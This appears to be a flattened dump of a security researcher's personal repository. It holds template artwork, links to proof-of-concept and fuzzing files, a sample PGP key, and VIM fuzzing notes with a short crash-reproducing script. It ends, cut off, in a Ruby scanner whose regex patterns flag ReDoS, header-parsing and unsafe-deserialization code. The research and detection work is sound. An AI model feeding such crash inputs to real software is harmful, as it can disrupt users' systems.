745.1992 -529.0156 L 4466 | 745.1992 -539.8154 L 4467 | 756 -539.8154 L 4468 | f 4469 | 101.2754 -89.3589 m 4470 | 101.2754 -79.6392 L 4471 | 91.5557 -79.6392 L 4472 | 91.5557 -89.3589 L 4473 | 101.2754 -89.3589 L 4474 | f 4475 | 0 To 4476 | 1 0 0 1 388.4302 -469.9316 0 Tp 4477 | 0 Tv 4478 | TP 4479 | -39.0149 0 Td 4480 | 0 Tr 4481 | 0 0 0 1 k 4482 | /_Helvetica 10 9.31 -2.2501 Tf 4483 | 100 Tt 4484 | 1 Ta 4485 | 12 0 Tl 4486 | 1 Tc 4487 | (Street address\r) Tx 1 0 Tk 4488 | -0.7755 -12 Td 4489 | ( City) Tx 1 100 Tk 4490 | (, State Zip\r) Tx 1 0 Tk 4491 | -15.5002 -12 Td 4492 | (V) Tx 1 80 Tk 4493 | (oice \(555\)555-5555\r) Tx 1 0 Tk 4494 | 5.0198 -12 Td 4495 | (F) Tx 1 50 Tk 4496 | (ax \(555\)555-5555\r) Tx 1 0 Tk 4497 | -3.2944 -12 Td 4498 | (email@address) Tx 1 15 Tk 4499 | (.com\r) Tx 1 0 Tk 4500 | 6.983 -12 Td 4501 | (www) Tx 1 60 Tk 4502 | (.w) Tx 1 10 Tk 4503 | (ebsite) Tx 1 15 Tk 4504 | (.com) Tx 1 0 Tk 4505 | (\r) TX 4506 | TO 4507 | 0 To 4508 | 1 0 0 1 735.46 -408.6777 0 Tp 4509 | 0 Tv 4510 | TP 4511 | -95.6044 0 Td 4512 | 0 Tr 4513 | /_Helvetica 18 16.758 -4.0501 Tf 4514 | 0 Tt 4515 | 2 Ta 4516 | 19.5 0 Tl 4517 | 0 Tc 4518 | (Sub ) Tx 1 50 Tk 4519 | (Title f) Tx 1 30 Tk 4520 | (or\r) Tx 1 0 Tk 4521 | -15.0812 -19.5 Td 4522 | (y) Tx 1 20 Tk 4523 | (our brochure\r) Tx 1 0 Tk 4524 | 74.6678 -19.5 Td 4525 | (here) Tx 1 0 Tk 4526 | (\r) TX 4527 | TO 4528 | 0 To 4529 | 0 1 -1 0 70.5156 -52.1777 0 Tp 4530 | 0 Tv 4531 | TP 4532 | -419.4681 0 Td 4533 | 0 Tr 4534 | 1 0.6 0 0.06 (PANTONE 286 CVU) 0 x 4535 | /_Helvetica-Bold 37 35.5942 -8.4359 Tf 4536 | 1040 Tt 4537 | 35 0 Tl 4538 | 38.48 Tc 4539 | (headline) Tx 1 0 Tk 4540 | (\r) TX 4541 | TO 4542 | 754.0771 -83.2285 m 4543 | 754.0771 -36.7285 L 4544 | 635.5771 -36.7285 L 4545 | 635.5771 -83.2285 L 4546 | 754.0771 -83.2285 L 4547 | (f) * 4548 | 0 Ap 4549 | 522.46 4009.0105 m 4550 | 522.46 -4630.9902 L 4551 | (N) * 4552 | 252.46 4002.0093 m 4553 | 252.46 -4637.9902 L 4554 | (N) * 4555 | 0 To 4556 | 1 0 0 1 735.46 -273.2402 0 Tp 4557 | 0 Tv 4558 | TP 4559 | -119.4505 0 Td 4560 | 0 Tr 4561 | 0 O 4562 | 1 0.6 0 0.06 (PANTONE 286 CVU) 0 x 4563 | /_Helvetica-Bold 36 34.6322 -8.2079 Tf 4564 | 0 Tt 4565 | 40 0 Tl 4566 | 0 Tc 4567 | (Ho) Tx 1 15 Tk 4568 | (w to\r) Tx 1 0 Tk 4569 | -37.7281 -40 Td 4570 | ( sell y) Tx 1 25 Tk 4571 | (our\r) Tx 1 0 Tk 4572 | -10.1563 -40 Td 4573 | ( compan) Tx 1 20 Tk 4574 | (y) Tx 1 0 Tk 4575 | (\r) TX 4576 | TO 4577 | 0 To 4578 | 1 0 0 1 388.23 -455.8223 0 Tp 4579 | 0 Tv 4580 | TP 4581 | -60.4601 0 Td 4582 | 0 Tr 4583 | 0 0 0 1 k 4584 | /_Helvetica-Bold 14 13.4681 -3.192 Tf 4585 | 100 Tt 4586 | 1 Ta 4587 | 21 0 Tl 4588 | 1.4 Tc 4589 | (Compan) Tx 1 20 Tk 4590 | (y Name) Tx 1 0 Tk 4591 | (\r) TX 4592 | TO 4593 | 1 To 4594 | 1 0 0 1 113.5156 -90.4282 0 Tp 4595 | 0 Tv 4596 | 1 Ap 4597 | 238.5156 -170.3271 m 4598 | 238.5156 -90.4282 L 4599 | 113.5156 -90.4282 L 4600 | 113.5156 -170.3271 L 4601 | 238.5156 -170.3271 L 4602 | n 4603 | TP 4604 | 0 -9 Td 4605 | 0 Tr 4606 | 0 O 4607 | 0 0 0 1 k 4608 | /_Helvetica 10 9.31 -2.2501 Tf 4609 | 0 Tt 4610 | 0 Ta 4611 | 12 0 Tl 4612 | 0 Tc 4613 | (Quamquam quinquennalis ) Tx 1 0 Tk 4614 | T* 4615 | (sab) Tx 1 20 Tk 4616 | (urre comiter insectat ) Tx 1 0 Tk 4617 | T* 4618 | (chirog) Tx 1 10 Tk 4619 | (r) Tx 1 10 Tk 4620 | (aphi.) Tx 1 60 Tk 4621 | ( ) Tx 1 0 Tk 4622 | (\r) TX 4623 | TO 4624 | 0 To 4625 | 1 0 0 1 113.5156 -83.1816 0 Tp 4626 | 0 Tv 4627 | TP 4628 | 0 Tr 4629 | /_Helvetica-Bold 10 9.6201 -2.28 Tf 4630 | (Main P) Tx 1 40 Tk 4631 | (oint) Tx 1 0 Tk 4632 | (\r) TX 4633 | TO 4634 | 1 0.6 0 0.06 (PANTONE 286 CVU) 0 x 4635 | 101.2754 -202.1494 m 4636 | 101.2754 -192.4297 L 4637 | 91.5557 -192.4297 L 4638 | 91.5557 -202.1494 L 4639 | 101.2754 -202.1494 L 4640 | f 4641 | 1 To 4642 | 1 0 0 1 113.5156 -203.2188 0 Tp 4643 | 0 Tv 4644 | 238.5156 -283.1177 m 4645 | 238.5156 -203.2188 L 4646 | 113.5156 -203.2188 L 4647 | 113.5156 -283.1177 L 4648 | 238.5156 -283.1177 L 4649 | n 4650 | TP 4651 | 0 -9 Td 4652 | 0 Tr 4653 | 0 O 4654 | 0 0 0 1 k 4655 | /_Helvetica 10 9.31 -2.2501 Tf 4656 | (Quamquam quinquennalis ) Tx 1 0 Tk 4657 | T* 4658 | (sab) Tx 1 20 Tk 4659 | (urre comiter insectat ) Tx 1 0 Tk 4660 | T* 4661 | (chirog) Tx 1 10 Tk 4662 | (r) Tx 1 10 Tk 4663 | (aphi.) Tx 1 60 Tk 4664 | ( ) Tx 1 0 Tk 4665 | (\r) TX 4666 | TO 4667 | 0 To 4668 | 1 0 0 1 113.5156 -195.9722 0 Tp 4669 | 0 Tv 4670 | TP 4671 | 0 Tr 4672 | /_Helvetica-Bold 10 9.6201 -2.28 Tf 4673 | (Main P) Tx 1 40 Tk 4674 | (oint) Tx 1 0 Tk 4675 | (\r) TX 4676 | TO 4677 | 1 0.6 0 0.06 (PANTONE 286 CVU) 0 x 4678 | 101.2754 -314.9395 m 4679 | 101.2754 -305.2202 L 4680 | 91.5557 -305.2202 L 4681 | 91.5557 -314.9395 L 4682 | 101.2754 -314.9395 L 4683 | f 4684 | 1 To 4685 | 1 0 0 1 113.5156 -316.0098 0 Tp 4686 | 0 Tv 4687 | 238.5156 -395.9082 m 4688 | 238.5156 -316.0098 L 4689 | 113.5156 -316.0098 L 4690 | 113.5156 -395.9082 L 4691 | 238.5156 -395.9082 L 4692 | n 4693 | TP 4694 | 0 -9 Td 4695 | 0 Tr 4696 | 0 O 4697 | 0 0 0 1 k 4698 | /_Helvetica 10 9.31 -2.2501 Tf 4699 | (Quamquam quinquennalis ) Tx 1 0 Tk 4700 | T* 4701 | (sab) Tx 1 20 Tk 4702 | (urre comiter insectat ) Tx 1 0 Tk 4703 | T* 4704 | (chirog) Tx 1 10 Tk 4705 | (r) Tx 1 10 Tk 4706 | (aphi.) Tx 1 60 Tk 4707 | ( ) Tx 1 0 Tk 4708 | (\r) TX 4709 | TO 4710 | 0 To 4711 | 1 0 0 1 113.5156 -308.7627 0 Tp 4712 | 0 Tv 4713 | TP 4714 | 0 Tr 4715 | /_Helvetica-Bold 10 9.6201 -2.28 Tf 4716 | (Main P) Tx 1 40 Tk 4717 | (oint) Tx 1 0 Tk 4718 | (\r) TX 4719 | TO 4720 | 1 0.6 0 0.06 (PANTONE 286 CVU) 0 x 4721 | 101.2754 -427.7305 m 4722 | 101.2754 -418.0107 L 4723 | 91.5557 -418.0107 L 4724 | 91.5557 -427.7305 L 4725 | 101.2754 -427.7305 L 4726 | f 4727 | 1 To 4728 | 1 0 0 1 113.5156 -428.7998 0 Tp 4729 | 0 Tv 4730 | 238.5156 -508.6992 m 4731 | 238.5156 -428.7998 L 4732 | 113.5156 -428.7998 L 4733 | 113.5156 -508.6992 L 4734 | 238.5156 -508.6992 L 4735 | n 4736 | TP 4737 | 0 -9 Td 4738 | 0 Tr 4739 | 0 O 4740 | 0 0 0 1 k 4741 | /_Helvetica 10 9.31 -2.2501 Tf 4742 | (Quamquam quinquennalis ) Tx 1 0 Tk 4743 | T* 4744 | (sab) Tx 1 20 Tk 4745 | (urre comiter insectat ) Tx 1 0 Tk 4746 | T* 4747 | (chirog) Tx 1 10 Tk 4748 | (r) Tx 1 10 Tk 4749 | (aphi.) Tx 1 60 Tk 4750 | ( ) Tx 1 0 Tk 4751 | (\r) TX 4752 | TO 4753 | 0 To 4754 | 1 0 0 1 113.5156 -421.5527 0 Tp 4755 | 0 Tv 4756 | TP 4757 | 0 Tr 4758 | /_Helvetica-Bold 10 9.6201 -2.28 Tf 4759 | (Main P) Tx 1 40 Tk 4760 | (oint) Tx 1 0 Tk 4761 | (\r) TX 4762 | TO 4763 | LB 4764 | %AI5_EndLayer-- 4765 | %AI3_BeginCrops 4766 | userdict /AI3_noCropMarks known not { 4767 | 0 A 4768 | u 4769 | u 4770 | 0 Ap 4771 | 0 R 4772 | 0 0 0 1 K 4773 | 800 Ar 4774 | 0 J 0 j 0.5 w 4 M []0 d 4775 | %AI3_Note: 4776 | 0 D 4777 | 0 XR 4778 | -8.5 -612.5 m 4779 | -35.5 -612.5 L 4780 | S 4781 | 0.5 -621.5 m 4782 | 0.5 -648.5 L 4783 | S 4784 | U 4785 | u 4786 | -8.5 -0.5 m 4787 | -35.5 -0.5 L 4788 | S 4789 | 0.5 8.5 m 4790 | 0.5 35.5 L 4791 | S 4792 | U 4793 | u 4794 | 801.5 -0.5 m 4795 | 828.5 -0.5 L 4796 | S 4797 | 792.5 8.5 m 4798 | 792.5 35.5 L 4799 | S 4800 | U 4801 | u 4802 | 801.5 -612.5 m 4803 | 828.5 -612.5 L 4804 | S 4805 | 792.5 -621.5 m 4806 | 792.5 -648.5 L 4807 | S 4808 | U 4809 | U 4810 | } if 4811 | %AI3_EndCrops 4812 | %%PageTrailer 4813 | gsave annotatepage grestore showpage 4814 | %%Trailer 4815 | Adobe_Illustrator_AI5 /terminate get exec 4816 | Adobe_ColorImage_AI6 /terminate get exec 4817 | Adobe_typography_AI5 /terminate get exec 4818 | Adobe_cshow /terminate get exec 4819 | Adobe_level2_AI5 /terminate get exec 4820 | %%EOF 4821 | -------------------------------------------------------------------------------- /Address_Bar_Spoofing_Browser.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/Address_Bar_Spoofing_Browser.gif -------------------------------------------------------------------------------- /Amazon.crt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/Amazon.crt -------------------------------------------------------------------------------- /Corpus_PDF.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/Corpus_PDF.zip -------------------------------------------------------------------------------- /FVLC1.mov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/FVLC1.mov -------------------------------------------------------------------------------- /FVLC2.mov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/FVLC2.mov -------------------------------------------------------------------------------- /FVLC3.mov: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/FVLC3.mov -------------------------------------------------------------------------------- /FuzzFactory.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/FuzzFactory.zip -------------------------------------------------------------------------------- /FuzzVLC.mkv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/FuzzVLC.mkv -------------------------------------------------------------------------------- /GoDaddyRootCertificateAuthority-G2.crt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/GoDaddyRootCertificateAuthority-G2.crt -------------------------------------------------------------------------------- /PDFzorro_PoC.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/PDFzorro_PoC.gif -------------------------------------------------------------------------------- /PoC.ctb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/PoC.ctb -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PersonalStuff 2 | 3 | * sax.tar.xz - Epic sax guy video in (.m3u8) format. 4 | 5 | * Telegram_Privacy.pdf - Privacy bug in Telegram. 6 | 7 | * firefoxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.lnk - Corpous for fuzzing liblnk. 8 | 9 | * pack.sh - Standard packages to resolve common dependencies in Ubuntu 18.04. 10 | 11 | * tcpcorpus.tar.xz - Corpous for fuzzing tcpdump. 12 | 13 | * vim_crashes.zip - Crashes for VIM identified during fuzzing. 14 | -------------------------------------------------------------------------------- /Sample.key: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP PUBLIC KEY BLOCK----- 2 | Version: Keybase OpenPGP v1.0.0 3 | Comment: https://keybase.io/crypto 4 | 5 | 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 96 | =RDr4 97 | -----END PGP PUBLIC KEY BLOCK----- 98 | -------------------------------------------------------------------------------- /SampleBurpCert: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/SampleBurpCert -------------------------------------------------------------------------------- /Sample_Lock.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/Sample_Lock.pdf -------------------------------------------------------------------------------- /Telegram_Privacy.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RootUp/PersonalStuff/1c49beb7ec96ccbb9709d4453b76c43e0557bb28/Telegram_Privacy.pdf -------------------------------------------------------------------------------- /VIMNotes: -------------------------------------------------------------------------------- 1 | Fuzzing VIM Notes: 2 | 3 | test_garbagecollect_now() must be used with care, since it can cause freeing memory may lead to uaf. 4 | 5 | cat sgv.vim 6 | ow?all ?? 7 | se 8 | ./vim -u NONE -e -s -S sgv.vim -c qa 9 | -------------------------------------------------------------------------------- /audit-ruby.rb: -------------------------------------------------------------------------------- 1 | require 'parser/current' 2 | 3 | class WebFrameworkSecurityScanner 4 | HIGH_RISK_PATTERNS = { 5 | regex_dos: [ 6 | /\A\s*header\.to_s\.split\(['"]\s*,\s*['"].*\)/, 7 | /\A\s*part\.split\(['"]\s*;\s*['"].*\)/, 8 | /Regexp\.new\(.*params.*\)/ 9 | ], 10 | 11 | 12 | header_parsing: [ 13 | /parse_http_accept_header/, 14 | /parse_http_forwarded_header/, 15 | /parse_authorization_header/ 16 | ], 17 | 18 | 19 | deserialization: [ 20 | /Marshal\.load/, 21 | /JSON\.load/, 22 | /YAML\.load(?!_safe)/ 23 | ] 24 | } 25 | 26 | def initialize(project_path) 27 | @project_path = project_path 28 | @findings = [] 29 | end 30 | 31 | def scan 32 | ruby_files.each do |file| 33 | content = File.read(file) 34 | relative_path = file.sub("#{@project_path}/", '') 35 | 36 | HIGH_RISK_PATTERNS.each do |vulnerability_type, patterns| 37 | patterns.each do |pattern| 38 | if match = content.match(pattern) 39 | line_number = count_lines_until_match(content, match.begin(0)) 40 | context = extract_context(content, line_number) 41 | 42 | record_finding( 43 | file: relative_path, 44 | line: line_number, 45 | vulnerability: vulnerability_type, 46 | context: context, 47 | pattern: pattern.source 48 | ) 49 | end 50 | end 51 | end 52 | end 53 | 54 | report_findings 55 | end 56 | 57 | private 58 | 59 | def ruby_files 60 | Dir.glob("#{@project_path}/**/*.rb") 61 | end 62 | 63 | def count_lines_until_match(content, position) 64 | content[0..position].count("\n") + 1 65 | end 66 | 67 | def extract_context(content, line_number) 68 | lines = content.split("\n") 69 | start_line = [line_number - 2, 0].max 70 | end_line = [line_number + 2, lines.length - 1].min 71 | 72 | lines[start_line..end_line].join("\n") 73 | end 74 | 75 | def record_finding(finding) 76 | @findings << finding 77 | end 78 | 79 | def report_findings 80 | return puts "No high-risk vulnerabilities found." if @findings.empty? 81 | 82 | puts "\nPotential High-Risk Security Issues Found:" 83 | puts "=========================================" 84 | 85 | @findings.each do |finding| 86 | puts "\nFile: #{finding[:file]}" 87 | puts "Line: #{finding[:line]}" 88 | puts "Type: #{finding[:vulnerability]}" 89 | puts "\nRelevant Code:\n#{finding[:context]}" 90 | puts "\nPotential Impact:" 91 | puts case finding[:vulnerability] 92 | when :regex_dos 93 | "Risk of ReDoS attack through unsafe string parsing" 94 | when :header_parsing 95 | "Potential DoS through header parsing vulnerability" 96 | when :deserialization 97 | "Unsafe deserialization could lead to RCE" 98 | end 99 | puts "----------------------------------------" 100 | end 101 | end 102 | end 103 | 104 | if __FILE__ == $0 105 | scanner = 